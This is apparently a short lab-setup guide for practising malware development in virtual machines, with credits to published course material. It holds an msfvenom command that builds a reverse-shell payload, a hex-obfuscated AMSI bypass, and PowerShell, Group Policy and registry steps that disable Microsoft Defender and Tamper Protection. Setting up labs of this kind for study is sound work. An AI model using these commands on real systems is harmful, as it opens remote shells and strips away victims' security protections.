- Process Hacker
- Kali VM
- Windows 11 or 10 VM
- Parrot
You might need to generate the payload in Kali.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP_ADDR> LPORT=4444 -f c
Windows 10 or lower version should be fine after this step, but if you are testing in Window 11+, I recommend you to go through step 2 and 3 as well.
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
[Ref].Assembly.GetType('System.Management.Automation.'+$("41 6D 73 69 55 74 69 6C 73".Split(" ")|forEach{[char]([convert]::toint16($_,16))}|forEach{$result=$result+$_};$result)).GetField($("61 6D 73 69 49 6E 69 74 46 61 69 6C 65 64".Split(" ")|forEach{[char]([convert]::toint16($_,16))}|forEach{$result2=$result2+$_};$result2),'NonPublic,Static').SetValue($null,$true)
# WIN + R
gpedit.msc-
In the
Group Policy Editor, go toComputer Configuration>Administrative Templates>Windows Components>Microsoft Defender Antivirus. -
Navigate to
Computer Configuration>Administrative Templates>Windows Components>Microsoft Defender Antivirus>Tamper Protection. -
Enable the policy named Turn off
Tamper Protection. -
Find the policy named Turn off
Microsoft Defender Antivirus. -
Double-click it, set it to
Enabled, and then clickApplyandOK. -
Go to
Real-time Protection under theMicrosoft Defender Antivirus settings. -
Find Turn off
real-time protectionand set it toEnabled
# WIN + R
regeditGo to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
- DisableAntiSpyware = 1
- DisableRoutinelyTakingAction = 1
- ServiceStartStates = 4
Start-Process powershell -Verb runAs
# Run the command prompt
powershell -Command "Start-Process cmd -Verb RunAs"
- Most of codes are from Malware-Development-for-Ethical-Hackers by Zhassulan Zhussupov, 2024.
- cocomelonc (Zhassulan Zhussupov) (2021) https://cocomelonc.github.io/ (blog).
- DLL Hijacking Basics by Enes Adışen, 2023.